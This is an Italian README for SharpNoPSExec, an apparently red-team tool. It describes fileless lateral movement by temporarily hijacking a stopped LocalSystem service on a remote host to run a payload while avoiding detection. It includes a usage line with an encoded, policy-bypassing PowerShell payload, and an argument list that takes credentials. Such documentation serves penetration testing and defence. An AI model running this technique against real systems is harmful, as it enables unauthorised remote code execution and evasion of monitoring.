
Esegui comandi senza file per il movimento laterale.
SharpNoPSExec interroga tutti i servizi e ne seleziona casualmente uno con tipo di avvio disabilitato o manuale, stato corrente fermo e privilegi di LocalSystem da riutilizzare.
Una volta selezionato il servizio, ne salva lo stato corrente, sostituisce il percorso binario con il payload scelto e lo esegue.
Dopo aver atteso 5 secondi, ripristina la configurazione del servizio e molto probabilmente avrai la tua shell :)
Questo strumento è ispirato alla spiegazione di PSExec di #OSEP per il movimento laterale; leggendo l'esercizio ho realizzato di poter effettuare il movimento laterale senza toccare il disco e senza creare un nuovo servizio per evitare il rilevamento.
███████╗██╗ ██╗ █████╗ ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ ███████╗███████╗██╗ ██╗███████╗ ██████╗
██╔════╝██║ ██║██╔══██╗██╔══██╗██╔══██╗████╗ ██║██╔═══██╗██╔══██╗██╔════╝██╔════╝╚██╗██╔╝██╔════╝██╔════╝
███████╗███████║███████║██████╔╝██████╔╝██╔██╗ ██║██║ ██║██████╔╝███████╗█████╗ ╚███╔╝ █████╗ ██║
╚════██║██╔══██║██╔══██║██╔══██╗██╔═══╝ ██║╚██╗██║██║ ██║██╔═══╝ ╚════██║██╔══╝ ██╔██╗ ██╔══╝ ██║
███████║██║ ██║██║ ██║██║ ██║██║ ██║ ╚████║╚██████╔╝██║ ███████║███████╗██╔╝ ██╗███████╗╚██████╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═════╝
Versione: 0.0.3
Autore: Julio Ureña (PlainText)
Twitter: @juliourena
SharpNoPSExec.exe --target=192.168.56.128 --payload=""c:\windows\system32\cmd.exe /c powershell -exec bypass -nop -e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=""
Argomenti obbligatori:
--target= - IP o nome del computer da attaccare.
--payload= - Payload da eseguire sul computer remoto.
Argomenti opzionali:
--username= - Nome utente per autenticarsi al computer remoto.
--password= - Password dell'utente.
--domain= - Nome del dominio, se non impostato verrà usato un punto (.).
--service= - Servizio da modificare per eseguire il payload; dopo l'esecuzione del payload il servizio verrà ripristinato.
Nota: Se non viene specificato alcun servizio, il programma cercherà un servizio casuale da eseguire.
Nota: Se il servizio selezionato ha un account non di sistema, verrà ignorato.
--help - Mostra le informazioni di aiuto.